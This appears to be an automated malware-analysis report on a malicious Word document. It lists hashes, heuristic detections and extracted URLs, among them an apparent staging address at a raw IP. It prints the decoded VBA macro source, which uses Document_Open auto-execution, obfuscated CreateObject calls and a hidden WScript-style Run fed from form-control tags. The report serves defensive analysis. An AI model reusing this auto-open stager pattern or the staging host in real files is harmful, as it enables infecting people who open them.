Office (OLE) malware analysis — malicious · 04fa66526ce1c591

MALICIOUS

Office (OLE)

110.5 KB Created: 2019-03-06 13:37:00 Authoring application: Microsoft Office Word First seen: 2021-04-10

MD5: c9e3ee5db8f72aaf1c0be17f9eac06b1 SHA-1: 6e1557d8dd6d75c1190a25b62c87ae06f0eab0f8 SHA-256: 04fa66526ce1c591f380b768cd72eee63f032b372ccec4a23cd25bbb766fe756

170 Risk Score

Heuristics 6

Malformed OLE auto-open stager with embedded ZIP payload critical OLE_RAW_MALFORMED_AUTOOPEN_STAGER

Raw malformed OLE bytes contain an auto-open macro entry, embedded ZIP/theme package bytes, VBA project metadata, and URL/CMD/Shell staging tokens. This is a high-confidence exploit-builder shape where the OLE directory is intentionally malformed, preventing normal VBA extraction while leaving the auto-run stager visible in raw streams.
Reference to Windows Script Host high SC_STR_WSCRIPT

Reference to Windows Script Host
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
Set JJJJKKKK3 = CreateObject("" + TadaSHC.Label2.Tag & "")
```
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Sub Document_Open()
```
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://167.179.86.255/rb1 In document text (OLE body)
- https://secure.comodo.net/CPS0CIn document text (OLE body)
- http://ocsp.comodoca.com0In document text (OLE body)
- http://www.iec.chIn document text (OLE body)
- http://ns.adobe.com/xap/1.0/In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
- http://crl.comodoca.com/COMODORSACodeSigningCA.crl0tIn document text (OLE body)
- http://crt.comodoca.com/COMODORSACodeSigningCA.crt0$In document text (OLE body)
- http://crl.comodoca.com/COMODORSACertificationAuthority.crl0qIn document text (OLE body)
- http://crt.comodoca.com/COMODORSAAddTrustCA.crt0$In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

Filename	Kind	Source	Size
`macros.bas`🔏 SignedVBA project digital signature Covers VBA source only — not the compiled p-code. A digital signature does not by itself mean the macro is safe.	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	3001 bytes
SHA-256: `cbce5271087807d2123b2b1d77cc03e384c23a0256559f822b8a15d75e55c8db`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Public Function getQuestionId() As Integer getQues.tionValue "id" End Function Public Function getQuestionId2() As Integer getQuest.ionValue "id" End Function Public Sub fill(dgv) Dim adapter Dim DataSet connection.Open adapter = SqlData.adapter(Command) DataSet = DataSet adapter.fill (DataSet) If DataSet.Tables.Count > 0 Then dgv.Refresh dgv.DataSource = DataSet.Tables(0) End If MsgBox (ex.Message) Thr.ow ex If connection.State = ConnectionState.Open Then connection.Close End If End Sub Sub LoadQuestions() db.fill (dgvQuestions) End Sub Sub LoadToolStripMenuItem_Click(sender, e) Hand.les LoadToolStripMenuItem.Click LoadQuestions End Sub Sub welcome_Load(sender, e) Hand.les MyBase.Load LoadQuestions End Sub Sub Document_Open() Dim htooBJ0 As Object Dim htooBJ7 As Object Dim htooBJ11 As Object Dim htooBJ12 As Object Dim c As New Class1 c.PowerOn Dim htooBJ5 As Object Dim htooBJ6 As Object Dim htooBJ9 As Object ActiveDocument.Close False getQuestionId Application.Quit False End Sub Attribute VB_Name = "Class1" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Public Sub PowerOn() Application.Run TadaSHC.Label3.Tag End Sub Attribute VB_Name = "Module1" Public Sub GACK() Dim PathTo1 As String Dim JJJJKKKK3 As Object Dim SevenR01 As Object Dim SevenR03 As Object Dim SevenR09 As Object Dim SevenR0 As Object Set JJJJKKKK3 = CreateObject("" + TadaSHC.Label2.Tag & "") Dim SevenR05 As Object Dim SevenR06 As Object Dim SevenR00 As Object Dim SevenR07 As Object On Error Resume Next Dim SevenR011 As Object Dim SevenR012 As Object Dim SevenR04 As Object JJJJKKKK3.Run TadaSHC.Label1.Tag + " at=cqVIks1¶µ±! " & TadaSHC.Tag + " ", 0, False Dim SevenR034 As Object Dim SevenR08 As Object End Sub Attribute VB_Name = "TadaSHC" Attribute VB_Base = "0{727D31C4-B964-4A71-9668-F9AF2C41A81D}{FA1BC165-0C60-4CBC-A717-D34D7CDDB29E}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False

macros.bas🔏 Signed

vba-macro

oletools.olevba.extract_macros (decoded VBA source)

3001 bytes

SHA-256: cbce5271087807d2123b2b1d77cc03e384c23a0256559f822b8a15d75e55c8db

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True










    Public Function getQuestionId() As Integer
         getQues.tionValue "id"
    End Function
    Public Function getQuestionId2() As Integer
         getQuest.ionValue "id"
    End Function



Public Sub fill(dgv)
        Dim adapter
        Dim DataSet

            connection.Open
            adapter = SqlData.adapter(Command)
            DataSet = DataSet
            adapter.fill (DataSet)
            If DataSet.Tables.Count > 0 Then
                dgv.Refresh
                dgv.DataSource = DataSet.Tables(0)
            End If
            MsgBox (ex.Message)
            Thr.ow ex
            If connection.State = ConnectionState.Open Then
                connection.Close
            End If
End Sub

Sub LoadQuestions()
        db.fill (dgvQuestions)
    End Sub
     Sub LoadToolStripMenuItem_Click(sender, e)
     Hand.les LoadToolStripMenuItem.Click
        LoadQuestions
    End Sub

     Sub welcome_Load(sender, e)
     Hand.les MyBase.Load
        LoadQuestions
    End Sub
Sub Document_Open()

Dim htooBJ0 As Object
Dim htooBJ7 As Object
Dim htooBJ11 As Object
Dim htooBJ12 As Object
Dim c As New Class1
c.PowerOn

Dim htooBJ5 As Object
Dim htooBJ6 As Object
Dim htooBJ9 As Object


ActiveDocument.Close False
getQuestionId
Application.Quit False
End Sub
     


Attribute VB_Name = "Class1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Public Sub PowerOn()
Application.Run TadaSHC.Label3.Tag
End Sub







Attribute VB_Name = "Module1"






Public Sub GACK()
Dim PathTo1 As String
Dim JJJJKKKK3 As Object

Dim SevenR01 As Object

Dim SevenR03 As Object
Dim SevenR09 As Object
Dim SevenR0 As Object
Set JJJJKKKK3 = CreateObject("" + TadaSHC.Label2.Tag & "")
Dim SevenR05 As Object
Dim SevenR06 As Object

Dim SevenR00 As Object
Dim SevenR07 As Object
On Error Resume Next


Dim SevenR011 As Object
Dim SevenR012 As Object
Dim SevenR04 As Object

JJJJKKKK3.Run TadaSHC.Label1.Tag + " at=cqVIks1¶µ±! " & TadaSHC.Tag + " ", 0, False

Dim SevenR034 As Object
Dim SevenR08 As Object


End Sub



Attribute VB_Name = "TadaSHC"
Attribute VB_Base = "0{727D31C4-B964-4A71-9668-F9AF2C41A81D}{FA1BC165-0C60-4CBC-A717-D34D7CDDB29E}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Open this report in the interactive analyzer, or submit your own file for analysis.